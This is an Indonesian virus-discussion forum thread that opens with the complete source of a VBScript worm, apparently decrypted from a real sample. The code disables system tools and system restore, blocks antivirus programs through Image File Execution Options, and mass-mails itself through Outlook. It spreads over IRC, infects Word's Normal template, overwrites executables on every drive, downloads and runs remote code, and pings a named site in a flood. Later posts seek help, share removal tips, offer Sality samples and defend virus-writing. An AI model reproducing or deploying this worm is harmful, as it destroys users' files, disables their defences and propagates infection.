rg.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger",""
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger",""
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"
msgbox "WE aRe A ViRuS AnD VerY DangeR Virus By 9A SPEnzAxs!"
msgbox "SaY Bye bYe for your Exe File And SoftwaRe"
msgbox "ThiS me The CReaTor Trojanssss Boy xxxxxxxxxxxxx"
msgbox "Contact us....................."
msgbox "We WiLL Atack You AND YouR PC...!"
msgbox "s***,,,,,F*U** YOUr Foolll Anti Virus......"
msgbox "s***,,,xxxxxxxxxxxxxxxxxxxxxxx"
msgbox "F*U**..........xxxxxxxxxxxxxxxxx"
msgbox "You LikE A big Foll xxxxxxxxxxxxxxxxxxxx"
msgbox "This should LIKe This...xxxxx"
msgbox "SPEnzax The BESt SchoollLL...xxxxxx"
msgbox "F*U** You Are...xxxxxxxxxxxxxxx"
msgbox "Sorry . . . . . "
msgbox "Foollll......xxxxxxxxxxx"
msgbox "No BodY Can HElP You Except MeeeE..............xxxxx"
msgbox "xxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
msgbox "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
msgbox "9x 2y aljabAR...xxxxxxxxxxxxxxxxxxx"
mail()
sub mail()
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
For y = 1 To b.AddressLists.Count
Set d = b.AddressLists(y)
x = 1
Set c = a.CreateItem(0)
For oo = 1 To d.AddressEntries.Count
e = d.AddressEntries(x)
c.Recipients.Add e
x = x + 1
If x > 10 Then oo = d.AddressEntries.Count
Next
c.Subject = "Halow...........................Salam dari 9A.........!"
c.Body = "...Ini adalah file yang berisi pesan-pesan perpisahan X_SPENZA_X"
c.attachments.Add wscript.scriptfullname, 1, 1
c.attachments.Add "c:\Dra.....Jatim.vbs", 1, 2, "c:\Ler.log.vbs"
c.attachments.Add "c:\Gamers1.vbs", 1, 3, "c:\Visual.vbs"
c.Send
e = ""
Next
b.Logoff
End If
end sub
reg()
sub reg()
dim j
Set j = CreateObject("WScript.Shell")
j.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*HLM", wscript.scriptfullname
end sub
update()
Sub update()
Dim objInet, a
Dim strDownloadedCode
Set objInet = CreateObject("InetCtls.Inet")
objInet.RequestTimeOut = 30
strDownloadedCode = objInet.OpenURL("http://www.vb-bego.com/")
set fso = createobject("scripting.filesystemobject")
set f = fso.CreateTextFile("c:\update.vbs")
f.write strDownloadedCode
f.close
Set a = CreateObject("WScript.Shell")
a.run ("c:\update.vbs")
end sub
irc()
sub irc()
set fso = createobject("scripting.filesystemobject")
set scrini = fso.CreateTextFile("c:\program files\PusiQu.txt.vbs\script.ini")
scrini.WriteLine "[script]"
scrini.WriteLine "n0=on 1:JOIN:#:{"
scrini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scrini.WriteLine "n2= /dcc send $nick " & wscript.scriptfullname
scrini.WriteLine "n3=}"
scrini.Close
end sub
word()
sub word()
norm ="Sub document_close()" & vbCrLf & _
"On Error Resume Next" & vbCrLf & _
"Open ""c:\xploit.txt"" For Output As 2" & vbCrLf & _
"Print #2, ""sub document_open()""" & vbCrLf & _
"Print #2, ""On Error Resume Next""" & vbCrLf & _
"Print #2, ""'by alcopaul""" & vbCrLf & _
"Print #2, ""obj = ActiveDocument.Shapes(1).OLEFormat.ClassType""" & vbCrLf & _
"Print #2, ""With ActiveDocument.Shapes(1).OLEFormat""" & vbCrLf & _
"Print #2, "" .ActivateAs ClassType:=obj""" & vbCrLf & _
"Print #2, "" .Activate""" & vbCrLf & _
"Print #2, ""End With""" & vbCrLf & _
"Print #2, ""end sub""" & vbCrLf & _
"Close 2" & vbCrLf & _
"Set fso = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf & _
"Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule" & vbCrLf & _
"Set iw = fso.OpenTextFile(""c:\xploit.txt"", 1, True)" & vbCrLf & _
"nt.DeleteLines 1, nt.CountOfLines" & vbCrLf & _
"i = 1 " & vbCrLf & _
"Do While iw.atendofstream <> True" & vbCrLf & _
"b = iw.readline" & vbCrLf & _
"nt.InsertLines i, b " & vbCrLf & _
"i = i + 1 " & vbCrLf & _
"Loop" & vbCrLf & _
"ActiveDocument.Shapes.AddOLEObject _" & vbCrLf & _
"FileName:=""c:\F*U**.vbs"", _" & vbCrLf & _
"LinkToFile:=False" & vbCrLf & _
"ActiveDocument.Save" & vbCrLf & _
"Open ""c:\vv.reg"" For Output As 3" & vbCrLf & _
"Print #3, ""REGEDIT4""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, """"""AccessVBOM""""=dword:00000001""" & vbCrLf & _
"Close 3" & vbCrLf & _
"Shell ""regedit /s c:\vv.reg"", vbHide" & vbCrLf & _
"Kill ""c:\vv.reg""" & vbCrLf & _
"End Sub"
Set fso = CreateObject("Scripting.FileSystemObject")
set f = fso.createtextfile("c:\try.txt")
f.write norm
f.Close
Set oword = CreateObject("Word.Application")
oword.Visible = False
Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile("c:\try.txt", 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop
oword.NormalTemplate.Save
oword.NormalTemplate.Close
end sub
haha()
Sub haha()
On Error Resume Next
Dim d, dc, s, fso, haha
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 Then
hihi (d.Path & "\")
End If
Next
haha = s
End Sub
Sub hehe(folderspec)
On Error Resume Next
Dim f, f1, fc, ext, s, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
ext = fso.GetExtensionName(f1.Path)
ext = LCase(ext)
s = LCase(f1.Name)
If (ext = "exe") Then
Set f = fso.GetFile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
fso.deletefile(f1.path)
End If
If (s = "winlogon.exe") Or (s = "mp3") or (s = "doc") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path)
fso.deletefile(f1.path)
End If
If (ext = "mp3") Or (ext = "docx") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
End If
Next
End Sub
Sub hihi(folderspec)
On Error Resume Next
Dim f, f1, sf, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
hehe (f1.Path)
hihi (f1.Path)
Next
End Sub
dos()
sub dos()
Dim a
Set a = CreateObject("WScript.Shell")
a.run ("c:\windows\ping.exe -t -l 10000 http://malingsia.com/")
end sub
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"

ane nemu googling gan, itu sepertinya pernah kena kompi sya juga, tapi dlam bentuk encrypt, itu sya dpet di decrypt.....
Judul: Re: Bedah Virus Disini !
Ditulis oleh: auliart pada Pebruari 21, 2011, 09:14:52 PM
gan kompi ane kayanya kena virus nih,
tapi bingung virus apaan, ini virus ngurangin space hardisk mulu.
ada yang tau ga apa virusnya sama ngatasinnya gimna? soalnya kerjaan ane terancam gan :(

thanks
Judul: Re: Bedah Virus Disini !
Ditulis oleh: joe_eky pada Maret 03, 2011, 05:37:13 AM
@auliart: kayaknya anda kena virus stuxnet
read here http://vaksin.com/2011/0111/stuxnet/stuxnet.html

Smadav 8.4.1 koq belum bisa mendeteksi virus ramnnit ma stuxnet ya?saya sudah liat di database nya gak ada.Maaf low oot,tolong ditambah di database untuk rev smadav selanjutnya ya bro.mohon dengan sangat.Hot malware soalnya.
Judul: Re: Bedah Virus Disini !
Ditulis oleh: diarganteng pada Maret 05, 2011, 04:47:06 PM
Maaf nih para master ane mo nanya...
usb dan memory card saya kena virus recycler.... Udah di delete ama smadav... Tapi pas waktu buka folder lg kok terdeteksi lagi? Ngga mau ilang meskipun mudah di hapus folder recycler nya... Ada solusi nya ...???
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ĵŏřĩş™ pada Maret 05, 2011, 07:17:47 PM
Maaf nih para master ane mo nanya...
usb dan memory card saya kena virus recycler.... Udah di delete ama smadav... Tapi pas waktu buka folder lg kok terdeteksi lagi? Ngga mau ilang meskipun mudah di hapus folder recycler nya... Ada solusi nya ...???
Kayanya tuh virus dah jalan di memory...
Coba periksa lagi pake Norman Malware Cleaner untuk pendeteksian lebih baik
Judul: Re: Bedah Virus Disini !
Ditulis oleh: diarganteng pada Maret 06, 2011, 05:36:17 AM
 :D Terima Kasih di coba dulu ya
Judul: Re: Bedah Virus Disini !
Ditulis oleh: cybergun pada Maret 06, 2011, 02:44:02 PM
Maaf nih para master ane mo nanya...
usb dan memory card saya kena virus recycler.... Udah di delete ama smadav... Tapi pas waktu buka folder lg kok terdeteksi lagi? Ngga mau ilang meskipun mudah di hapus folder recycler nya... Ada solusi nya ...???


coba gan format flash maupun card nya, setelah itu cek kompi apa ada virus atau file yang mencurigakan. walaupun flash dah di format kalo masternya masih tinggal di kompi niscaya akan kembali lagi gan. kalo ane biasanya ngecek lewat linux live atau scan lewat dos.

Judul: Re: Bedah Virus Disini !
Ditulis oleh: smallfish pada Maret 11, 2011, 08:57:41 AM
wedew virus baru lagi yach, serem amat nih virus.







Rift Platinum (http://www.zyy.com/gold/Rift-Planes-of-Telara-US-Platinum.html)Rift Plat (http://www.zyy.com/gold/Rift-Planes-of-Telara-US-Platinum.html)Rift Gold (http://www.zyy.com/gold/Rift-Planes-of-Telara-US-Platinum.html)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: ALI DIMYATI pada Maret 11, 2011, 04:27:18 PM
Virus oh virus, engkau memang menggemaskan dan sekaligus memuakan...tapi walaupun demikian ku hargai engkau sebagaimana aku menghargai virus yang membuat penyakit pada manusia. karena bagiku engkau adalah sebuah mahkluk virtual yang hakekatnya Alloh yang menciptakan. dan tidak ada yang sia-sia atas semua penciptaanNya.
Judul: Re: Bedah Virus Disini !
Ditulis oleh: rioke pada Maret 11, 2011, 04:36:45 PM
Virus oh virus, engkau memang menggemaskan dan sekaligus memuakan...tapi walaupun demikian ku hargai engkau sebagaimana aku menghargai virus yang membuat penyakit pada manusia. karena bagiku engkau adalah sebuah mahkluk virtual yang hakekatnya Alloh yang menciptakan. dan tidak ada yang sia-sia atas semua penciptaanNya.
Allah yg menciptakan si pembuat virus, klo virusnya sapa yah ??? (ayo ngaku  ;> )
Judul: Re: Bedah Virus Disini !
Ditulis oleh: biond jose fernando pada Maret 31, 2011, 06:28:26 PM
bagaimana ngilangin virus sality ?
Judul: Re: Bedah Virus Disini !
Ditulis oleh: biond jose fernando pada Maret 31, 2011, 06:29:33 PM
bagaimana ngilangin virus sality ? soalnya g ilangilang ..
Judul: Re: Bedah Virus Disini !
Ditulis oleh: agus_suardana pada Maret 31, 2011, 08:44:50 PM
bagaimana ngilangin virus sality ? soalnya g ilangilang ..
AV Luar udh bisa ngapus sality kok
contoh ny MSE,ESET,Kaspersky :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Masdio pada Maret 31, 2011, 08:48:33 PM
bagaimana ngilangin virus sality ? soalnya g ilangilang ..
AV Luar udh bisa ngapus sality kok
contoh ny MSE,ESET,Kaspersky :-bd
ane se7, av luar mampu kok hapus sality. :-bd contohnya AVG 2011 yg ad teknik hapus paksa virus bandel. =))
Judul: Re: Bedah Virus Disini !
Ditulis oleh: cybergun pada April 01, 2011, 09:34:18 AM
ane gak bisa uji coba.
gakada sample sality.   ^:)^ ^:)^
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Sikatro pada April 01, 2011, 09:12:38 PM
ane gak bisa uji coba.
gakada sample sality.   ^:)^ ^:)^

bener nih mau ujicoba?? :D mau bedah sality disini? mau berapa sample salitynya?  gw ada banyakkkk. kalo mau ujicoba nanti gw kasih,tapi kalo ngga ya ngga gw kasih. beneran lho?  ;D
mau varian apa? sality AE, sality AA ,atao sality AT yg paling ngeselin?
Judul: Re: Bedah Virus Disini !
Ditulis oleh: agus_suardana pada April 01, 2011, 09:58:02 PM
@up
Sality AT aj bro :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: cybergun pada April 08, 2011, 02:01:34 PM
ane gak bisa uji coba.
gakada sample sality.   ^:)^ ^:)^

bener nih mau ujicoba?? :D mau bedah sality disini? mau berapa sample salitynya?  gw ada banyakkkk. kalo mau ujicoba nanti gw kasih,tapi kalo ngga ya ngga gw kasih. beneran lho?  ;D
mau varian apa? sality AE, sality AA ,atao sality AT yg paling ngeselin?


boleh juga via pm, emang varian nya ada apa aja?? \m/ \m/
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Smash.- pada April 13, 2011, 06:30:41 PM
Thx Infonya
Judul: Re: Bedah Virus Disini !
Ditulis oleh: ifdall pada April 17, 2011, 03:06:59 AM
boleh om sampel nya...kirim ke email saya yah di zip aja sama di kasih password jgn lupa password nya kasih tau
Judul: Re: Bedah Virus Disini !
Ditulis oleh: han_hanafi2000 pada Mei 06, 2011, 05:30:54 PM
thank gan tas tutoriale... moga manfaat
Judul: Re: Bedah Virus Disini !
Ditulis oleh: IPGI pada Mei 20, 2011, 02:35:03 PM
saya mau tanya... perbedaan virus, worm & trojan apa ya??? bukan'y worm / trojan uda termasuk virus
Judul: Re: Bedah Virus Disini !
Ditulis oleh: zeal pada Mei 20, 2011, 06:47:17 PM
untungnya belum pernah ngalami sih. cuma dulu sering banget kena virus yang buat laptop ane lemot banget. kalo dah gitu smadav dan avira pasti not responding. ada yang tau g kenapa ato virus apa?
Judul: Re: Bedah Virus Disini !
Ditulis oleh: IPGI pada Mei 21, 2011, 06:35:26 PM
Qlw bs virus yang terdeteksi di upload az ke smadav, biar bs di teliti...
Judul: Re: Bedah Virus Disini !
Ditulis oleh: verbum4it pada Mei 23, 2011, 10:17:24 AM
Soal pembuatan virus oleh pihak-pihak tertentu. Positifnya adalah bahwa anak-anak bangsa kita ini memiliki potensi yang bagus dan perlu dikembangkan terus. Namun yang disayangkan adalah mengapa koch justru membuat virus yang nota bene untuk merusak? Kembangkanlah potensi anda untuk hal-hal yang berguna dan membangun negeri tercinta ini. Negeri kita sudah memiliki permasalahan yang sangat kompleks untuk itu mohon supaya kita tidak menimbulkan masalah baru.
Judul: Re: Bedah Virus Disini !
Ditulis oleh: mapix pada Mei 23, 2011, 06:49:49 PM
saya mau tanya... perbedaan virus, worm & trojan apa ya??? bukan'y worm / trojan uda termasuk virus
virus = tugasnya menginjeksi file korban, sehingga file korban tidak lagi seperti aslinya

worm = tugasnya menyembunyikan/menghapus file korban dan mengganti dgn dirinya sendiri, mengaduk-aduk registry, dan sering mebuat pesan sponsor. :D

trojan = tugasnya mencuri semua data/informasi dari PC korban. \m/
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Mr Kemo AV pada Mei 23, 2011, 08:09:17 PM
Buat AV Maker yang jago2 coba buat detector untuk virus ini, jangan main ceksum, karena ini file terinfeksi :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: == C l o n i n g == pada Mei 24, 2011, 01:26:52 AM
Soal pembuatan virus oleh pihak-pihak tertentu. Positifnya adalah bahwa anak-anak bangsa kita ini memiliki potensi yang bagus dan perlu dikembangkan terus. Namun yang disayangkan adalah mengapa koch justru membuat virus yang nota bene untuk merusak? Kembangkanlah potensi anda untuk hal-hal yang berguna dan membangun negeri tercinta ini. Negeri kita sudah memiliki permasalahan yang sangat kompleks untuk itu mohon supaya kita tidak menimbulkan masalah baru.
terlepas dari semua kontroversi tentang dampak kerusakan yang ditimbulkan oleh virus
sebenarnya pembuatan virus juga mempunyai dasar yang mulia   >=)
menurut agan-agan,manakah  yang lebih merusak virus ranmit ataukah virus situs-2 porno-------
kalau menurut aq lebih besar dampak yang ditimbulkan oleh para pendiri situs-2 porno,kerusakan yang ditimbulkannya bersifat permanen dan juga menginfeksi semua generasi muda maupun tua.bahkan sampai anak anak sd pun sekarang sudah mulai banyak yang terinfeksi.
apa yang dapat dilakukan penegak hukum-------tidak ada---kenapa-----
dari sinilah para virus maker mulai prihatin......dan mulai mencari cara untuk melumpuhkan website-website
yang merusak moral dan peradaban umat manusia
untuk melumpuhkan website tsb dibutuhkan serangan secara bersama-sama,
semakin bayak jumlah komputer yang di infeksi maka akan semakin mudah untuk melumpuhkan website tsb.
berikut petikan kata dari salah satu virus maker
           Kesedihanmu adalah
           kebahagianku.
           Karena sungguh
           kecemerlangan hatimu,
           membuatku ingin
           membunuhmu!!!
                               [Sajak Izazil Menggugat: Prolog]
Judul: kenapa SMADAV 8.5 dianggap virus sama avira premium security suite..
Ditulis oleh: sidiqdrummer pada Mei 25, 2011, 09:42:00 AM
bro mohon petunjuk ni, kok smadav 8.5 w dianggap virus ia ama avira premium security w..
tapi klo yg 8.4 ngga ??
setiap mo w instal selalu dibantai avira smadav 8.5 w..
kenpa ia..
mohon petunjuk nya ni... :'( :'( :'(
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ryan BeKaBe pada Mei 25, 2011, 09:57:20 AM
@sidiqdrummer: Sebagai virus apa katanya?
Judul: Re: kenapa SMADAV 8.5 dianggap virus sama avira premium security suite..
Ditulis oleh: Melvin pada Mei 25, 2011, 10:45:56 AM
bro mohon petunjuk ni, kok smadav 8.5 w dianggap virus ia ama avira premium security w..
tapi klo yg 8.4 ngga ??
setiap mo w instal selalu dibantai avira smadav 8.5 w..
kenpa ia..
mohon petunjuk nya ni... :'( :'( :'(
itu false detek avira, tadi ane barusan lapor ke avira
semoga besok, gk rusuh lagi ma avira
Judul: Re: Bedah Virus Disini !
Ditulis oleh: :Pak:Bos: pada Mei 25, 2011, 06:01:10 PM
Kalau smadav8.5 dianggap virus ama avira, ganti aja engine dan loov smadav8.4 dengan smadav8.5
Judul: Re: Bedah Virus Disini !
Ditulis oleh: roy_ryadi pada Juni 17, 2011, 12:05:08 PM
eemm salam kenal all....q mau tanya nh ma temen2 knp sh ko banyak bgt org yang bisa bikin virus bahkan d toko2 buku pun bannyak bgt di jual buku2 cara bikin virus, apa sih keuntungannya bikin virus minta kejelasannya....thanks
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Jastis pada Juni 18, 2011, 06:25:05 PM
Ada virus ada ada Anti virus dan sebaliknya juga.......
Judul: Re: Bedah Virus Disini !
Ditulis oleh: mapix pada Juni 18, 2011, 07:10:04 PM
eemm salam kenal all....q mau tanya nh ma temen2 knp sh ko banyak bgt org yang bisa bikin virus bahkan d toko2 buku pun bannyak bgt di jual buku2 cara bikin virus, apa sih keuntungannya bikin virus minta kejelasannya....thanks
banyak tujuan yg diinginkan orang dalam membuat virus, misalnya untuk curhat, melampiaskan kemarahan, patah hati ;D, mencuri data orang utk mencari materi >:(, sekedar pamer/narsis =)), atau yang tega ingin merusak PC orang dan lebih mengenaskan apabila ada orang membuat virus agar antivirus buatannya cepat laku karena hanya dia yg sanggup mendeteksi dan menyembuhkan dari serangan virus tersebut. ~x(
Judul: Re: Bedah Virus Disini !
Ditulis oleh: agus_suardana pada Juni 25, 2011, 02:33:54 PM
Buat AV Maker yang jago2 coba buat detector untuk virus ini, jangan main ceksum, karena ini file terinfeksi :-bd
makasi om :D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: zen_fadil pada Juni 26, 2011, 10:27:00 PM
wew, trnyata tujuan buat virus ngeri juga gan.. jd pgn coba.. :D  ;D
Judul: Re: Bedah Virus Disini ! => Trojan House Generic21.ATUY [AVG]
Ditulis oleh: Jastis pada Juli 05, 2011, 04:37:46 AM
Nih virus [:\\Sl0zPz1458syhXV8z54flEE05yzL4uFQe3F\Ua3kmh73O3jyut4Iok.exe] saya dapat sewaktu numpang ngeprint disalah satu rental foto copy.
Setelah saya colok Flashdisk semua data saya berubah jadi shortcut dengan extension .ink tetapi anehnya,
semua file saya masih bisa diakses dengan mengklik shortcut tersebut :D

Detect By AVG,tapi tidak dpt membersihkan :D
(http://img228.imageshack.us/img228/5410/avastj.png)

Lalu saya coba menampilkan file2 yg tersembunyi melalui folder option [saya rasa semua sudah tahu]
dan file asli saya kelihatan tetapi dalam bentuk hidden :D

Nih nama dan folder virusnya :
(http://i51.tinypic.com/15owcxi.png)

Lalu saya coba delete tuh folder dan tidak terlalu sulit :D
Jika kita mengklik kanan pada file yg sudah jadi shortcut maka hasilnya seperti ini :
(http://i51.tinypic.com/2mrb1o5.png)
(http://i51.tinypic.com/15hoe9y.png)

Ternyata tidak begitu menyulitkan :)
Bagi yang mau filenya silahkan download di attach.

Thanks



Judul: Re: Bedah Virus Disini !
Ditulis oleh: Desperados pada Juli 10, 2011, 04:04:40 PM
nama malcode/malware nx apa nih..???
Judul: Re: Bedah Virus Disini !
Ditulis oleh: shikamaru_puma pada Juli 10, 2011, 04:16:44 PM
klo Win32/zbot.g tuh nginfeksi'a dr mana y Gan ? Masa' PC ane dah pake AVG + Smadav 8.5 p'nah kena  :'(
Judul: Re: Bedah Virus Disini !
Ditulis oleh: :Pak:Bos: pada Juli 11, 2011, 05:27:11 AM
@puma:: dari file yg udah terinfeksi. Seperti exe html  dll. Atau dari exploit
Judul: Re: Bedah Virus Disini !
Ditulis oleh: shikamaru_puma pada Juli 12, 2011, 08:02:39 AM
@puma:: dari file yg udah terinfeksi. Seperti exe html  dll. Atau dari exploit

wah, brarti bner neh gara2 adik ane CopPas game dr warnet (gk install)  :'(
Judul: Re: Bedah Virus Disini !
Ditulis oleh: klasnich pada Juli 14, 2011, 02:53:37 PM
eemm salam kenal all....q mau tanya nh ma temen2 knp sh ko banyak bgt org yang bisa bikin virus bahkan d toko2 buku pun bannyak bgt di jual buku2 cara bikin virus, apa sih keuntungannya bikin virus minta kejelasannya....thanks
banyak tujuan yg diinginkan orang dalam membuat virus, misalnya untuk curhat, melampiaskan kemarahan, patah hati ;D, mencuri data orang utk mencari materi >:(, sekedar pamer/narsis =)), atau yang tega ingin merusak PC orang dan lebih mengenaskan apabila ada orang membuat virus agar antivirus buatannya cepat laku karena hanya dia yg sanggup mendeteksi dan menyembuhkan dari serangan virus tersebut. ~x(

Tidak semua seperti yang anda duga bro, jika Anda mau tahu bahwa dalam 1 bulan ada sekitar 75 ribu virus yang dibuat oleh para pembuat virus, sedangkan antivirus yang beredar hanya sekitar 20 s/d 30 saja. Lalu bagaimana bisa antivirus buatan (orang pembuat virus) dapat bersaing jika antivirus yang lain justru sedang giat mengejar puluhan definisi virus yang telah disebarkan oleh berbagai macam kumpulan orang yg tidak bertanggung jawab. Bukan jaman-nya lagi orang iseng buat virus, karena virus yang Anda buat belum tentu bereaksi dan direspon positif oleh orang, karena ternyata pembuat virus alsi diluar sana lebih jago dari Anda (yg hanya memikirkan keuntungan pribadi).

PISS
Judul: Re: Bedah Virus Disini !
Ditulis oleh: sepatu BATA pada Juli 14, 2011, 03:46:00 PM
Bedah Virus : FLyff 666.dll.vbs

Sudah pernah dengar virus ini ??? kalau belum,gw juga baru2 aja dengar virus ginian.Ini salah satu virus yang dibuat oleh VM Indonesia Asli loh.....gw salut tuh sama VMnya [ om fly666 dari IH & DevilCode]... :-bd.Dab sepertinya virus ini belum disebarkan oleh siempunya,masih sebatas sharing di forum2 tertenu.Karena nih gw dapat dari teman saya di forum lain.

Lalu apa kehebatannya ???

Semua Drive di My Computer akan dihidden :
(http://i48.tinypic.com/huq0i1.jpg)

Control Panel akan didisable :
(http://i50.tinypic.com/5ajgcw.jpg)

Pesan di IE :
(http://i48.tinypic.com/1zd3xuf.jpg)

Akibat yang ditimbulkan dari virus ini :
=>Mendisable TaskManager,CMD,MsConfig,Regedit,Folder Option dll.
=>Akan membuat pesan Startup :” H4x0r3d By Flyff 666" dan “Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community".
=>Klik Kanan pada mouse akan didsable.
